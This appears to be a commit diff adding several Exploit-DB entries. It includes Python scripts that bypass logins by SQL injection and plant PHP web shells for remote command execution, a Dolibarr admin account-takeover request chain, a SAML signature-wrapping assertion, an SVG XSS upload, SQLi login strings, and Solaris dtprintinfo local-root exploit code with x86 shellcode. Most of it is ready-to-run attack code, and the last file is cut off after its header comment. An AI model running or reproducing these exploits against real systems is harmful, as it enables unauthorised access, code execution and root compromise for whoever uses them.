parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit')
parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url')
parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy')
args = parser.parse_args()
return args
def auth_bypass(s, proxies, url):
data = {
"username":"admin'#",
"password":""
}
r = s.post(url, data=data, proxies=proxies)
if('{"status":"success"}' in r.text):
cprint("[+] Authenticacion Bypass Success!\n", "green")
return s
else:
cprint("[-] Authenticacion Bypass Error!\n", "red")
sys.exit(0)
def upload_shell(s, proxies, url):
content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>"
file = {
'img':('cmd.php',content)
}
data = {
"name":"Event Registration System with QR Code - PHP",
"short_name":"ERS-QR-PHP",
}
r = s.post(url, files=file, data=data, proxies=proxies)
if('1' in r.text and r.status_code == 200):
cprint("[+] Upload Shell Success!\n", "green")
return s
else:
cprint("[-] Upload Shell Error!\n", "red")
sys.exit(0)
def get_shell_url(s, proxies, url):
r = s.get(url, proxies=proxies)
regex = '\_cmd.php"> (.*?)</a></li>'
shell_name = re.findall(regex, r.text)[0]
url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name)
cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green")
def main():
banner()
args = get_args()
target = args.target
proxies = {'http':'','https':''}
if args.proxy:
proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)}
login_url = target + "/event/classes/Login.php?f=rlogin"
upload_url = target + "/event/classes/SystemSettings.php?f=update_settings"
shell_url = target + "/event/uploads/"
s = requests.Session()
s = auth_bypass(s, proxies, login_url)
s = upload_shell(s, proxies, upload_url)
s = get_shell_url(s, proxies, shell_url)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
cprint("[-] User aborted session\n", "red")
sys.exit(0)
# Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo

9
exploits/php/webapps/50176.txt Normal file
View file

@ -0,0 +1,9 @@
# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
# Date: 03/08/2021
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4
The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.

25
exploits/php/webapps/50223.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)
# Date: 21/08/2021
# Exploit Author: Justin White
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html
# Version: 1.0
# Testeted on: Linux (Ubuntu 20.04) using LAMPP
## SQL Injection
# Vulnerable page
http://localhost/PhoneBook/index.php
# Vulnerable paramater
username1 & password
# POC
Username = ' or sleep(5)='-- -
Password = ' '
Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -"
# Vulnerable Code
index.php line 13
$sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");

73
exploits/php/webapps/50244.py Executable file
View file

@ -0,0 +1,73 @@
# Exploit Title: Traffic Offense Management System 1.0 - SQLi to Remote Code Execution (RCE) (Unauthenticated)
# Date: 19.08.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
# Version: 1.0
# Tested on: Linux
import requests
import random
import string
import json
from bs4 import BeautifulSoup
url = input("TARGET = ")
if not url.startswith('http://') and not url.startswith('https://'):
url = "http://" + url
if not url.endswith('/'):
url = url + "/"
payload= "<?php if(isset($_GET['tago'])){ $cmd = ($_GET['tago']); system($cmd); die; } ?>"
let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))
session = requests.session()
print("Login Bypass\n")
request_url = url + "/classes/Login.php?f=login"
post_data = {"username": "admin' or '1'='1'#", "password": ""}
bypassUser = session.post(request_url, data=post_data)
data = json.loads(bypassUser.text)
status = data["status"]
if status == "success":
print("Finding first driver\n")
getHTML = session.get(url + "admin/?page=drivers")
getHTMLParser = BeautifulSoup(getHTML.text, 'html.parser')
findFirstDriverID = getHTMLParser.find("a", {"class": "delete_data"}).get("data-id")
print("Found firs driver ID : " + findFirstDriverID)
print("\nFinding path")
findPath = session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+'\'')
findPath = findPath.text[findPath.text.index("<b>Warning</b>: ")+17:findPath.text.index("</b> on line ")]
findPath = findPath[findPath.index("<b>")+3:len(findPath)]
parser = findPath.split('\\')
parser.pop()
findPath = ""
for find in parser:
findPath += find + "/"
print("\nFound Path : " + findPath)
shellPath = findPath[findPath.index("admin/"):len(findPath)]
SQLtoRCE = "' LIMIT 0,1 INTO OUTFILE '#PATH#' LINES TERMINATED BY #PAYLOAD# -- -"
SQLtoRCE = SQLtoRCE.replace("#PATH#",findPath+shellname+".php")
SQLtoRCE = SQLtoRCE.replace("#PAYLOAD#", "0x3"+payload.encode("utf-8").hex())
print("\n\nShell Uploading...")
session.get(url + "admin/?page=drivers/manage_driver&id="+findFirstDriverID+SQLtoRCE)
print("\nShell Path : " + url+shellPath+shellname+".php")
shellOutput = session.get(url+shellPath+shellname+".php?tago=whoami")
print("\n\nShell Output : "+shellOutput.text)
else:
print("No bypass user")

192
exploits/php/webapps/50248.txt Normal file
View file

@ -0,0 +1,192 @@
# Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation
# Date: April 8, 2021
# Exploit Author: Vishwaraj101
# Vendor Homepage: https://www.dolibarr.org/
# Affected Version: <= 14.0.1
# Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d
*Summary:*
Using the below chain of issues attacker can compromise any dolibarr
user account including the admin.
*Poc:*
1. Visit https://example.com/api/index.php/login?login=demo&password=demo
try to login with a test user with 0 permissons or less permissions.
2. We will receive an api token in return.
3. Next we need to fetch the user id of the user whose account we want
to own.
*First we need to fetch the user id of the admin user using the below api.*
*Request1:*
GET /api/index.php/users/login/admin HTTP/1.1Host:
preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept:
application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close
*This will return the user details using the username. Now update the
victim user account via below api (include the json body received from the
previous request1 and replace the email id from below json to the attacker
controlled email)*
*Request2:*PUT /api/index.php/users/*12* HTTP/1.1
Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1;
WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87
Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept:
application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip,
deflateDOLAPIKEY: test1337Origin:
https://preview2.dolibarr.orgConnection: closeReferer:
http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length:
3221
{
"id": "12",
"statut": "1",
"employee": "1",
"civility_code": null,
"gender": "woman",
"birth": 495583200,
"email": "*attacker@example.com <attacker@example.com>*",
"personal_email": "",
"socialnetworks": {
"facebook": "",
"skype": "",
"twitter": "",
"linkedin": "",
"instagram": "",
"snapchat": "",
"googleplus": "",
"youtube": "",
"whatsapp": "",
"tumblr": "",
"vero": "",
"viadeo": "",
"slack": "",
"xing": "",
"meetup": "",
"pinterest": "",
"flickr": "",
"500px": "",
"giphy": "",
"gifycat": "",
"dailymotion": "",
"vimeo": "",
"periscope": "",
"twitch": "",
"discord": "",
"wikipedia": "",
"reddit": "",
"quora": "",
"tripadvisor": "",
"mastodon": "",
"diaspora": "",
"viber": ""
},
"job": "Admin Technical",
"signature": "",
"address": "",
"zip": "",
"town": "",
"state_id": null,
"state_code": null,
"state": null,
"office_phone": "",
"office_fax": "",
"user_mobile": "",
"personal_mobile": "",
"admin": "1",
"login": "admin",
"entity": "0",
"datec": 1507187386,
"datem": 1617819214,
"socid": null,
"contact_id": null,
"fk_member": null,
"fk_user": "11",
"fk_user_expense_validator": null,
"fk_user_holiday_validator": null,
"clicktodial_url": null,
"clicktodial_login": null,
"clicktodial_poste": null,
"datelastlogin": 1617816891,
"datepreviouslogin": 1617815935,
"datestartvalidity": "",
"dateendvalidity": "",
"photo": "com.jpg",
"lang": "fr_FR",
"rights": {
"user": {
"user": {},
"self": {}
}
},
"conf": {},
"users": [],
"parentof": null,
"accountancy_code": "",
"weeklyhours": "39.00000000",
"color": "",
"dateemployment": "",
"dateemploymentend": "",
"default_c_exp_tax_cat": null,
"default_range": null,
"fk_warehouse": null,
"import_key": null,
"array_options": [],
"array_languages": null,
"linkedObjectsIds": null,
"canvas": null,
"fk_project": null,
"contact": null,
"thirdparty": null,
"user": null,
"origin": null,
"origin_id": null,
"ref": "12",
"ref_ext": null,
"status": null,
"country": null,
"country_id": null,
"country_code": "",
"region_id": null,
"barcode_type": null,
"barcode_type_code": null,
"barcode_type_label": null,
"barcode_type_coder": null,
"mode_reglement_id": null,
"cond_reglement_id": null,
"demand_reason_id": null,
"transport_mode_id": null,
"cond_reglement": null,
"modelpdf": null,
"last_main_doc": null,
"fk_bank": null,
"fk_account": null,
"note_public": "",
"note_private": "",
"note": "",
"name": null,
"lastname": "Adminson",
"firstname": "Alice",
"civility_id": null,
"date_creation": null,
"date_validation": null,
"date_modification": null,
"specimen": 0,
"alreadypaid": null,
"liste_limit": 0
}
This will reset the admin email account to the attacker controlled
email account, now using the password reset feature attacker will
reset the admin account password and will gain access to the admin
account.

115
exploits/php/webapps/50361.txt Normal file
View file

@ -0,0 +1,115 @@
# Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping
# Date: 09/07/2021
# Exploit Author: Cristian 'void' Giustini
# Vendor Homepage: https://www.miniorange.com/
# Software Link: https://www.drupal.org/project/miniorange_saml
# Version: 8.x-2.22 (REQUIRED)
# Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38)
# Original article: https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/
# Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036
---
The MiniorangeSAML Drupal Plugin v. 8.x-2.22 is vulnerable to XML
Signature Wrapping Attacks that could allows an attacker to perform
privilege escalation attacks.
In order to exploit the vulnerability, the plugin must be configured
with the "Either SAML reponse or SAML assertion must be signed" options
enabled and an empty "x509 certificate".
Administrator point of view:
- Install a Drupal version (for the PoC the version 9.1.10 has been used)
- Configure an external SSO system like Auth0
- Configure the plugin with the Auth0 provider by checking the "Either
SAML response or SAML assertion must be signed" and empty "x509 certificate"
Attacker point of view:
- Register a normal user on the website
- Perform a login
- Intercept the request with Burp Suite and decode the SAMLResponse
parameter
- Inject an additional <Saml:Assertion> object before the original one
(example here:
https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml)
(SAMLRaider Burp extension, XSW3 payload)
<saml:Assertion ID="_evil_assertion_ID" IssueInstant="2021-06-23T21:04:01.551Z" Version="2.0"
xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
<saml:Issuer>urn:miniorange-research.eu.auth0.com</saml:Issuer>
<saml:Subject>
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">admin</saml:NameID>
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
<saml:SubjectConfirmationData InResponseTo="_f1e26bb0bd40be366c543e2c3fe0215747f40dadbb" NotOnOrAfter="2021-06-23T22:04:01.551Z" Recipient="http://localhost:8080/samlassertion"/>
</saml:SubjectConfirmation>
</saml:Subject>
<saml:Conditions NotBefore="2021-06-23T21:04:01.551Z" NotOnOrAfter="2021-06-23T22:04:01.551Z">
<saml:AudienceRestriction>
<saml:Audience>http://localhost:8080</saml:Audience>
</saml:AudienceRestriction>
</saml:Conditions>
<saml:AuthnStatement AuthnInstant="2021-06-23T21:04:01.551Z" SessionIndex="_WWwvhpmMv5eJI4bwPdsPAiasFpTH8gt_">
<saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef>
</saml:AuthnContext>
</saml:AuthnStatement>
<saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/identities/default/connection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">Username-Password-Authentication</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/identities/default/provider" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">auth0</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/identities/default/isSocial" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/clientID" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">8bbK44pPnBAqzN49pSuwmgdhgsZavkNI</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/created_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/email_verified" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/nickname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">test</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/picture" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:string">https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png</saml:AttributeValue>
</saml:Attribute>
<saml:Attribute Name="http://schemas.auth0.com/updated_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
<saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
</saml:Attribute>
</saml:AttributeStatement>
</saml:Assertion>
- Replace the username with one with higher privileges (like admin)
- Submit the request
- Successful exploitation

35
exploits/php/webapps/50363.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Phpwcms 1.9.30 - Arbitrary File Upload
# Date: 30/9/2021
# Exploit Author: Okan Kurtulus | okankurtulus.com.tr
# Software Link: http://www.phpwcms.org/
# Version: 1.9.30
# Tested on: Ubuntu 16.04
Steps:
1-) You need to login to the system.
http://target.com/phpwcms/login.php
2-) Creating payload with SVG extension: payload.svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("XSS!");
</script>
</svg>
3-) Go to the following link and upload the payload:
http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8
From the menu:
file -> multiple file upload -> Select files or drop here
4-) After uploading payload, call it from the link below.
http://192.168.1.112/phpwcms/upload/

356
exploits/solaris/local/49514.c Normal file
View file

@ -0,0 +1,356 @@
# Exploit Title: Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation (2)
# Date: 2021-02-01
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/solaris/solaris10/
# Version: Solaris 10
# Tested on: Solaris 10 1/13 Intel
/*
* raptor_dtprintcheckdir_intel.c - Solaris/Intel 0day? LPE
* Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* "What we do in life echoes in eternity" -- Maximus Decimus Meridius
* https://patchfriday.com/22/
*
* Another buffer overflow in the dtprintinfo(1) CDE Print Viewer, leading to
* local root. This one was discovered by Marti Guasch Jimenez, who attended my
* talk "A bug's life: story of a Solaris 0day" presented at #INFILTRATE19 on
* May 2nd, 2019 (https://github.com/0xdea/raptor_infiltrate19).
*
* It's a stack-based buffer overflow in the check_dir() function:
* void __0FJcheck_dirPcTBPPP6QStatusLineStructPii(...){
* char local_724 [300];
* ...
* __format = getenv("REQ_DIR");
* sprintf(local_724,__format,param_2);
*
* "To trigger this vulnerability we need a printer present, we can also fake
* it with the lpstat trick. We also need at least one directory in the path
* pointed by the environment variable TMP_DIR. Finally, we just need to set
* REQ_DIR with a value of 0x720 of padding + value to overwrite EBP + value to
* overwrite EIP." -- Marti Guasch Jimenez
*
* This bug was likely fixed during the general cleanup of CDE code done by
* Oracle in response to my recently reported vulnerabilities. However, I can't
* confirm this because I have no access to their patches:/
*
* Usage:
* $ gcc raptor_dtprintcheckdir_intel.c -o raptor_dtprintcheckdir_intel -Wall
* [on your xserver: disable the access control]
* $ ./raptor_dtprintcheckdir_intel 192.168.1.1:0
* [on your xserver: double click on the fake "fnord" printer]
* [...]
* # id
* uid=0(root) gid=1(other)
* #
*
* Tested on:
* SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
* [previous Solaris versions are also likely vulnerable]
*/
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#include <sys/types.h>
#define INFO1 "raptor_dtprintcheckdir_intel.c - Solaris/Intel 0day? LPE"
#define INFO2 "Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/dtprintinfo" // the vulnerable program
#define BUFSIZE 2048 // size of the evil env var
char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
/* double setuid() */
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
/* execve() */
"\x31\xc0\x50\x68/ksh\x68/bin"
"\x89\xe3\x50\x53\x89\xe2\x50"
"\x52\x53\xb0\x3b\x50\xcd\x91";
/* globals */
char *arg[2] = {"foo", NULL};
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
int get_sc_addr(char *path, char **argv);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE];
char platform[256], release[256], display[256];
int i, sc_addr;
int sb = ((int)argv[0] | 0xfff); /* stack base */
int ret = search_ldso("strcpy"); /* or sprintf */
int rwx_mem = search_rwx_mem(); /* rwx memory */
/* lpstat code to add a fake printer */
if (!strcmp(argv[0], "lpstat")) {
/* check command line */
if (argc != 2)
exit(1);
/* print the expected output and exit */
if(!strcmp(argv[1], "-v")) {
fprintf(stderr, "lpstat called with -v\n");
printf("device for fnord: /dev/null\n");
} else {
fprintf(stderr, "lpstat called with -d\n");
printf("system default destination: fnord\n");
}
exit(0);
}
/* helper program that prints argv[0] address, used by get_sc_addr() */
if (!strcmp(argv[0], "foo")) {
printf("0x%p\n", argv[0]);
exit(0);
}
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* process command line */
if (argc != 2) {
fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
exit(1);
}
sprintf(display, "DISPLAY=%s", argv[1]);
/* prepare the evil env var */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
memcpy(buf, "REQ_DIR=", 8);
/* fill the envp, keeping padding */
add_env(sc);
add_env(buf);
add_env(display);
add_env("TMP_DIR=/tmp");
add_env("PATH=.:/usr/bin");
add_env("HOME=/tmp");
add_env(NULL);
/* calculate the shellcode address */
sc_addr = get_sc_addr(VULN, argv);
/* fill with ld.so.1 address, saved eip, and arguments */
for (i = 12; i < BUFSIZE - 20; i += 4) {
set_val(buf, i, ret); /* strcpy */
set_val(buf, i += 4, rwx_mem); /* saved eip */
set_val(buf, i += 4, rwx_mem); /* 1st argument */
set_val(buf, i += 4, sc_addr); /* 2nd argument */
}
/* we need at least one directory inside TMP_DIR to trigger the bug */
mkdir("/tmp/one_dir", S_IRWXU | S_IRWXG | S_IRWXO);
/* create a symlink for the fake lpstat */
unlink("lpstat");
symlink(argv[0], "lpstat");
/* print some output */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* check for null bytes */
check_zero(sc_addr, "sc address");
/* run the vulnerable program */
execve(VULN, arg, env);
perror("execve");
exit(1);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return env_len;
}
/*
* check_zero(): check an address for the presence of a 0x00
*/
void check_zero(int addr, char *pattern)
{
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
exit(1);
}
}
/*
* get_sc_addr(): get shellcode address using a helper program
*/
int get_sc_addr(char *path, char **argv)
{
char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
char hex[11] = "\x00";
int fd[2], addr;
/* truncate program name at correct length and create a hard link */
prog[strlen(path)] = 0x0;
unlink(prog);
link(argv[0], prog);
/* open pipe to read program output */
if (pipe(fd) < 0) {
perror("pipe");
exit(1);
}
switch(fork()) {
case -1: /* cannot fork */
perror("fork");
exit(1);
case 0: /* child */
dup2(fd[1], 1);
close(fd[0]);
close(fd[1]);
execve(prog, arg, env);
perror("execve");
exit(1);
default: /* parent */
close(fd[1]);
read(fd[0], hex, sizeof(hex));
break;
}
/* check and return address */
if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) {
fprintf(stderr, "error: cannot read sc address from helper program\n");
exit(1);
}
return addr;
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_zero(addr - 4, sym);
return addr;
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address null bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return addr_old;
}
/*
* set_val(): copy a dword inside a buffer (little endian)
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0x000000ff);
buf[pos + 1] = (val & 0x0000ff00) >> 8;
buf[pos + 2] = (val & 0x00ff0000) >> 16;
buf[pos + 3] = (val & 0xff000000) >> 24;
}

279
exploits/solaris/local/49515.c Normal file
View file

@ -0,0 +1,279 @@
# Exploit Title: Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation (3)
# Date: 2021-02-01
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.oracle.com/solaris/solaris10/
# Version: Solaris 10
# Tested on: Solaris 10 1/13 Intel
/*
* raptor_dtprintcheckdir_intel2.c - Solaris/Intel FMT LPE
* Copyright (c) 2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* "I'm gonna have to go into hardcore hacking mode!" -- Hackerman
* https://youtu.be/KEkrWRHCDQU
*
* Same code snippet, different vulnerability. 20 years later, format string
* bugs are not extinct after all! The vulnerable function looks like this:
*
* void __0FJcheck_dirPcTBPPP6QStatusLineStructPii(...)
* {
* ...
* char local_724 [300];
* ...
* else {
* __format = getenv("REQ_DIR");
* sprintf(local_724,__format,param_2); // [1]
* }
* ...
* local_c = strlen(local_724); // [2]
* sprintf(local_5f8,"/var/spool/lp/tmp/%s/",param_2); // [3]
* ...
* }
*
* The plan (inspired by an old technique devised by gera) is to exploit the
* sprintf at [1], where we control the format string, to replace the strlen
* at [2] with a strdup and the sprintf at [3] with a call to the shellcode
* dynamically allocated in the heap by strdup and pointed to by the local_c
* variable at [2]. In practice, to pull this off the structure of the evil
* environment variable REQ_DIR must be:
* [sc] [pad] [.got/strlen] [.got/sprintf] [stackpop] [W .plt/strdup] [W call *-0x8(%ebp)]
*
* To collect the needed addresses for your system, use:
* $ objdump -R /usr/dt/bin/dtprintinfo | grep strlen # .got
* 080994cc R_386_JUMP_SLOT strlen
* $ objdump -R /usr/dt/bin/dtprintinfo | grep sprintf # .got
* 080994e4 R_386_JUMP_SLOT sprintf
* $ objdump -x /usr/dt/bin/dtprintinfo | grep strdup # .plt
* 0805df20 F *UND* 00000000 strdup
* $ objdump -d /usr/dt/bin/dtprintinfo | grep call | grep ebp | grep -- -0x8 # .text
* 08067f52: ff 55 f8 call *-0x8(%ebp)
*
* This bug was likely fixed during the general cleanup of CDE code done by
* Oracle in response to my recently reported vulnerabilities. However, I can't
* confirm this because I have no access to their patches:/
*
* See also:
* raptor_dtprintcheckdir_intel.c (vulnerability found by Marti Guasch Jimenez)
* raptor_dtprintcheckdir_sparc.c (just a proof of concept)
* raptor_dtprintcheckdir_sparc2.c (the real deal)
*
* Usage:
* $ gcc raptor_dtprintcheckdir_intel2.c -o raptor_dtprintcheckdir_intel2 -Wall
* [on your xserver: disable the access control]
* $ ./raptor_dtprintcheckdir_intel2 192.168.1.1:0
* [on your xserver: double click on the fake "fnord" printer]
* [...]
* # id
* uid=0(root) gid=1(other)
* #
*
* Tested on:
* SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
* [previous Solaris versions are also likely vulnerable]
*/
